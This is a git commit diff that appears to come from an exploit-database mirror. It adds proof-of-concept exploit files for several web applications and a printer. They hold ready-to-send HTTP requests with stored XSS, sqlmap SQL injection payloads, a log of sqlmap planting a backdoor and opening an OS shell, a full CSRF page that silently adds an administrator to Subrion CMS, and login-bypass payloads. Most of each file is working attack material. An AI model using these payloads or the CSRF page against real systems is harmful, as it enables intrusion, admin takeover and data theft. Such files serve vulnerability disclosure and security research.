DB: 2020-01-07
33 changes to exploits/shellcodes NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) SpotIE 2.9.5 - 'Key' Denial of Service (PoC) Dnss Domain Name Search Software - 'Key' Denial of Service (PoC) BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC) ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC) NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC) Dnss Domain Name Search Software - 'Name' Denial of Service (PoC) TextCrawler Pro3.1.1 - Denial of Service (PoC) RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC) Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC) RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC) NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC) Office Product Key Finder 1.5.4 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC) SpotMSN 2.4.6 - 'Name' Denial of Service (PoC) SpotIM 2.2 - 'Name' Denial Of Service FTPGetter Professional 5.97.0.223 - Denial of Service (PoC) Duplicate Cleaner Pro 4 - Denial of Service (PoC) Microsoft Outlook VCF cards - Denial of Service (PoC) Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path Windows - Shell COM Server Registrar Local Privilege Escalation Dairy Farm Shop Management System 1.0 - 'username' SQL Injection Complaint Management System 4.0 - 'cid' SQL injection IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin) Hostel Management System 2.0 - 'id' SQL Injection elaniin CMS 1.0 - Authentication Bypass Small CRM 2.0 - Authentication Bypass Voyager 1.3.0 - Directory Traversal Codoforum 4.8.3 - Persistent Cross-Site Scripting Django < 3.0 < 2.2 < 1.11 - Account Hijack Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
This commit is contained in:
parent
975e7769c7
commit
95c6eeab79
35 changed files with 1893 additions and 0 deletions
35
exploits/hardware/webapps/47850.txt
Normal file
35
exploits/hardware/webapps/47850.txt
Normal file
|
@ -0,0 +1,35 @@
|
||||||
|
# Exploit Title: IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting
|
||||||
|
# Date: 2020-01-02
|
||||||
|
# Exploit Author: Ismail Tasdelen
|
||||||
|
# Vendor Homepage: https://www.ibm.com/il-en
|
||||||
|
# Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-476&appname=USN
|
||||||
|
# Vulernability Type: Cross-site Scripting
|
||||||
|
# Vulenrability: Stored XSS
|
||||||
|
# CVE: N/A
|
||||||
|
|
||||||
|
# Description :
|
||||||
|
# Ricoh (IBM) InfoPrint 1532 devices allow Stored XSS via the 1.network.6.10 parameter to the
|
||||||
|
# cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html URI. (HTML Injection can also occur.)
|
||||||
|
|
||||||
|
HTTP Request :
|
||||||
|
|
||||||
|
POST /cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html HTTP/1.1
|
||||||
|
Host: 134.84.35.70
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 281
|
||||||
|
Origin: https://134.84.35.70
|
||||||
|
Connection: close
|
||||||
|
Referer: https://134.84.35.70/cgi-bin/dynamic/config/gen/general.html
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
0.printer.1.14=0&0.mfp.1.2=0&0.mfp.1.3=0&0.mfp.1.1=30&0.mfp.100.11=30&0.printer.4.258=1&1.network.6.10=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&1.network.6.11=&0.network.6.4=90&1.network.6.69=000000000000&2.network.6.63=0&0.network.10.73=120&1.printer.1.40=
|
||||||
|
|
||||||
|
HTTP Response :
|
||||||
|
|
||||||
|
HTTP/1.0 200 OK
|
||||||
|
Content-Type: text/html
|
||||||
|
Content-Length: 269
|
164
exploits/php/webapps/47846.txt
Normal file
164
exploits/php/webapps/47846.txt
Normal file
|
@ -0,0 +1,164 @@
|
||||||
|
# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 2020-01-03
|
||||||
|
# Exploit Author: Chris Inzinga
|
||||||
|
# Vendor Homepage: https://phpgurukul.com/
|
||||||
|
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
|
||||||
|
# Version: v1.0
|
||||||
|
# Tested on: Windows
|
||||||
|
# CVE: N/A
|
||||||
|
|
||||||
|
# The Dairy Farm Shop Management System 1.0 web application is vulnerable to
|
||||||
|
# SQL injection in multiple areas. The most severe of these is the username
|
||||||
|
# parameter on the login page as this injection can be done unauthenticated.
|
||||||
|
|
||||||
|
|
||||||
|
================================ 'username' - SQLi ================================
|
||||||
|
|
||||||
|
POST /dfsms/index.php HTTP/1.1
|
||||||
|
Host: 192.168.0.33
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: http://192.168.0.33/dfsms/index.php
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 34
|
||||||
|
Connection: close
|
||||||
|
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
username=test&password=test&login=
|
||||||
|
|
||||||
|
---
|
||||||
|
Parameter: username (POST)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
|
||||||
|
---
|
||||||
|
[INFO] the back-end DBMS is MySQL
|
||||||
|
back-end DBMS: MySQL >= 5.0.12
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
================================ 'category' & 'categorycode' - SQLi ================================
|
||||||
|
|
||||||
|
POST /dfsms/add-category.php HTTP/1.1
|
||||||
|
Host: 192.168.0.33
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: http://192.168.0.33/dfsms/add-category.php
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 39
|
||||||
|
Connection: close
|
||||||
|
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
category=test&categorycode=test&submit=
|
||||||
|
|
||||||
|
---
|
||||||
|
Parameter: category (POST)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
|
||||||
|
---
|
||||||
|
[INFO] the back-end DBMS is MySQL
|
||||||
|
back-end DBMS: MySQL >= 5.0.12
|
||||||
|
|
||||||
|
---
|
||||||
|
Parameter: categorycode (POST)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
|
||||||
|
---
|
||||||
|
[INFO] the back-end DBMS is MySQL
|
||||||
|
back-end DBMS: MySQL >= 5.0.12
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
================================ 'companyname' - SQLi ================================
|
||||||
|
|
||||||
|
---
|
||||||
|
Parameter: companyname (POST)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
|
||||||
|
---
|
||||||
|
[INFO] the back-end DBMS is MySQL
|
||||||
|
back-end DBMS: MySQL >= 5.0.12
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
================================ 'productname' & 'productprice' - SQLi ================================
|
||||||
|
|
||||||
|
---
|
||||||
|
Parameter: productname (POST)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
|
||||||
|
---
|
||||||
|
---
|
||||||
|
Parameter: productprice (POST)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
|
||||||
|
---
|
||||||
|
[INFO] the back-end DBMS is MySQL
|
||||||
|
back-end DBMS: MySQL >= 5.0.12
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
================================ 'fromdate' & 'todate' - SQLi ================================
|
||||||
|
|
||||||
|
---
|
||||||
|
Parameter: todate (POST)
|
||||||
|
Type: boolean-based blind
|
||||||
|
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
|
||||||
|
Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
|
||||||
|
|
||||||
|
Type: error-based
|
||||||
|
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||||
|
Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
|
||||||
|
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
|
||||||
|
|
||||||
|
Type: UNION query
|
||||||
|
Title: MySQL UNION query (NULL) - 5 columns
|
||||||
|
Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
|
||||||
|
|
||||||
|
Parameter: fromdate (POST)
|
||||||
|
Type: error-based
|
||||||
|
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||||
|
Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
|
||||||
|
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
|
||||||
|
---
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================
|
||||||
|
|
||||||
|
---
|
||||||
|
Parameter: emailid (POST)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
|
||||||
|
---
|
||||||
|
---
|
||||||
|
Parameter: adminname (POST)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
|
||||||
|
---
|
||||||
|
---
|
||||||
|
Parameter: mobilenumber (POST)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
|
||||||
|
---
|
45
exploits/php/webapps/47847.txt
Normal file
45
exploits/php/webapps/47847.txt
Normal file
|
@ -0,0 +1,45 @@
|
||||||
|
# Exploit Title: Complaint Management System 4.0 - 'cid' SQL injection
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 2020-01-03
|
||||||
|
# Exploit Author: FULLSHADE
|
||||||
|
# Vendor Homepage: https://phpgurukul.com
|
||||||
|
# Software Link: https://phpgurukul.com/complaint-management-sytem/
|
||||||
|
# Version: v4.0
|
||||||
|
# Tested on: Windows 7
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
Description:
|
||||||
|
|
||||||
|
The Complaint Management System v4.0 application from PHPgurukul is vulnerable to
|
||||||
|
blind SQL injection via the 'cid' parameter which is found on the complaint-details.php
|
||||||
|
page.
|
||||||
|
|
||||||
|
========== 1. SQLi ==========
|
||||||
|
|
||||||
|
SQLMAP POC:
|
||||||
|
|
||||||
|
GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
|
||||||
|
sqlmap identified the following injection point(s) with a total of 1748 HTTP(s) requests:
|
||||||
|
---
|
||||||
|
Parameter: cid (GET)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind
|
||||||
|
Payload: cid=2'+(SELECT 0x7648556f WHERE 4476=4476 AND SLEEP(5))+'
|
||||||
|
---
|
||||||
|
|
||||||
|
The ?cid parameter is vulnerable to sql injection within the
|
||||||
|
|
||||||
|
the vulnerable URL = https://10.0.0.214/complaint%20management%20system/cms/admin/complaint-details.php?cid=2
|
||||||
|
|
||||||
|
request:
|
||||||
|
|
||||||
|
GET /complaint%20management%20system/cms/admin/complaint-details.php?cid=2 HTTP/1.1
|
||||||
|
Host: 10.0.0.214
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
DNT: 1
|
||||||
|
Connection: close
|
||||||
|
Cookie: PHPSESSID=5bmri9rlp1jvrjkhgumn7v9fot
|
||||||
|
Upgrade-Insecure-Requests: 1
|
138
exploits/php/webapps/47851.txt
Normal file
138
exploits/php/webapps/47851.txt
Normal file
|
@ -0,0 +1,138 @@
|
||||||
|
# Exploit Title: Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)
|
||||||
|
# Date: 2020-01-05
|
||||||
|
# Exploit Author: Ismail Tasdelen
|
||||||
|
# Vendor Homepage: https://intelliants.com/
|
||||||
|
# Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5
|
||||||
|
# Software : Subrion CMS
|
||||||
|
# Product Version: v 4.0.5.10
|
||||||
|
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
|
||||||
|
# Vulenrability : Cross-Site Request Forgery
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
# Description :
|
||||||
|
# CSRF vulnerability was discovered in v4.0.5 version of Subrion CMS.
|
||||||
|
# With this vulnerability, authorized users can be added to the system.
|
||||||
|
|
||||||
|
HTML CSRF PoC :
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<script>history.pushState('', '', '/')</script>
|
||||||
|
<script>
|
||||||
|
function submitRequest()
|
||||||
|
{
|
||||||
|
var xhr = new XMLHttpRequest();
|
||||||
|
xhr.open("POST", "https:\/\/SERVER\/_core\/admin\/members\/add\/", true);
|
||||||
|
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
|
||||||
|
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
|
||||||
|
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------9973334999367242361642875270");
|
||||||
|
xhr.withCredentials = true;
|
||||||
|
var body = "-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"__st\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"41209a5f43b0d7c8cef0e7ffcd9ce160\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"username\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"ismailtasdelen\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"fullname\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"Ismail Tasdelen\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"email\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"test@mail.com\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"_password\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"Test1234!\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"_password2\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"Test1234!\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"1\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
|
||||||
|
"Content-Type: application/octet-stream\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"website\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"https://ismailtasdelen.com\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"phone\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"0000000000000000000\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"biography\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"NULL\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"facebook\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"twitter\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"gplus\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"linkedin\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"sponsored\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"0\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"plan_id\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"2\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"sponsored_end\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"2020-02-05 05:18:43\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"featured\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"0\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"featured_end\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"2020-02-05 05:19\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"status\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"active\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"save\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"Add\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"goto\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"list\r\n" +
|
||||||
|
"-----------------------------9973334999367242361642875270--\r\n";
|
||||||
|
var aBody = new Uint8Array(body.length);
|
||||||
|
for (var i = 0; i < aBody.length; i++)
|
||||||
|
aBody[i] = body.charCodeAt(i);
|
||||||
|
xhr.send(new Blob([aBody]));
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
<form action="#">
|
||||||
|
<input type="button" value="Submit request" onclick="submitRequest();" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
49
exploits/php/webapps/47854.txt
Normal file
49
exploits/php/webapps/47854.txt
Normal file
|
@ -0,0 +1,49 @@
|
||||||
|
# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection
|
||||||
|
# Google Dork: intitle: "Hostel management system"
|
||||||
|
# Date: 2020-01-03
|
||||||
|
# Exploit Author: FULLSHADE
|
||||||
|
# Vendor Homepage: https://phpgurukul.com
|
||||||
|
# Software Link: https://phpgurukul.com/hostel-management-system/
|
||||||
|
# Version: v2.0
|
||||||
|
# Tested on: Windows
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
Description:
|
||||||
|
|
||||||
|
The Hostel Management System v2.0 application from PHPgurukul is vulnerable to
|
||||||
|
SQL injection via the 'id' parameter on the full-profile.php page.
|
||||||
|
|
||||||
|
==================== 1. SQLi ====================
|
||||||
|
|
||||||
|
http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1
|
||||||
|
|
||||||
|
THe ?id parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
|
||||||
|
user has the full ability to run system commands via --os-shell and fully compromise the system
|
||||||
|
|
||||||
|
GET parameter 'id' is vulnerable.
|
||||||
|
|
||||||
|
---
|
||||||
|
Parameter: id (GET)
|
||||||
|
Type: boolean-based blind
|
||||||
|
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
|
||||||
|
Payload: id=-3444' OR 1650=1650#
|
||||||
|
|
||||||
|
Type: error-based
|
||||||
|
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||||
|
Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ
|
||||||
|
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 OR time-based blind
|
||||||
|
Payload: id=1' OR SLEEP(5)-- slKU
|
||||||
|
|
||||||
|
Type: UNION query
|
||||||
|
Title: MySQL UNION query (NULL) - 29 columns
|
||||||
|
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
|
||||||
|
|
||||||
|
[14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php
|
||||||
|
[14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php
|
||||||
|
[14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
|
||||||
|
os-shell> whoami
|
||||||
|
do you want to retrieve the command standard output? [Y/n/a] y
|
||||||
|
command standard output: 'john-pc\john'
|
||||||
|
os-shell>
|
30
exploits/php/webapps/47858.txt
Normal file
30
exploits/php/webapps/47858.txt
Normal file
|
@ -0,0 +1,30 @@
|
||||||
|
# Exploit Title: elaniin CMS 1.0 - Authentication Bypass
|
||||||
|
# Author: riamloo
|
||||||
|
# Date: 2020-01-02
|
||||||
|
# Vendor Homepage: https://elaniin.com/ ( github ==> https://github.com/elaniin/ )
|
||||||
|
# Software Link: https://github.com/elaniin/CMS/archive/master.zip
|
||||||
|
# Version: 1
|
||||||
|
# CVE: N/A
|
||||||
|
# Tested on: Win 10
|
||||||
|
|
||||||
|
# Discription:
|
||||||
|
# Open-source Content Management System created with PHP + MySQL https://elaniin.com/
|
||||||
|
# Vulnerability: Attacker can bypass login page and access to dashboard page
|
||||||
|
# vulnerable file : login.php
|
||||||
|
# Parameter & Payload: '=''or'
|
||||||
|
# Proof of Concept:
|
||||||
|
http://localhost/elaniin/login.php
|
||||||
|
|
||||||
|
POST /elaniin/login.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: multipart/form-data;
|
||||||
|
Content-Length: 334
|
||||||
|
Referer: http://localhost/elaniin/login.php
|
||||||
|
Cookie: PHPSESSID=81spdqht0gvh0f97vg62nzxs8
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
|
35
exploits/php/webapps/47874.txt
Normal file
35
exploits/php/webapps/47874.txt
Normal file
|
@ -0,0 +1,35 @@
|
||||||
|
# Exploit Title: Small CRM 2.0 - Authentication Bypass
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 2020-01-02
|
||||||
|
# Exploit Author: FULLSHADE
|
||||||
|
# Vendor Homepage: https://phpgurukul.com/
|
||||||
|
# Software Link: https://phpgurukul.com/small-crm-php/
|
||||||
|
# Version: V2.0
|
||||||
|
# Tested on: Windows
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
# Description:
|
||||||
|
#
|
||||||
|
# There is a SQL injection vulnerability in the /index.php page
|
||||||
|
# which allows for an attacker to use the SQLi login bypass payload
|
||||||
|
# '=''or' for both the username and password parameters, this allows
|
||||||
|
# for any authenticated or low level user to login to the admin account.
|
||||||
|
|
||||||
|
========== 1. Authentication bypass ==========
|
||||||
|
|
||||||
|
POST /Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php HTTP/1.1
|
||||||
|
Host: 10.0.0.214
|
||||||
|
User-Agent: Mozilla/5.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 57
|
||||||
|
Origin: http://10.0.0.214
|
||||||
|
DNT: 1
|
||||||
|
Connection: close
|
||||||
|
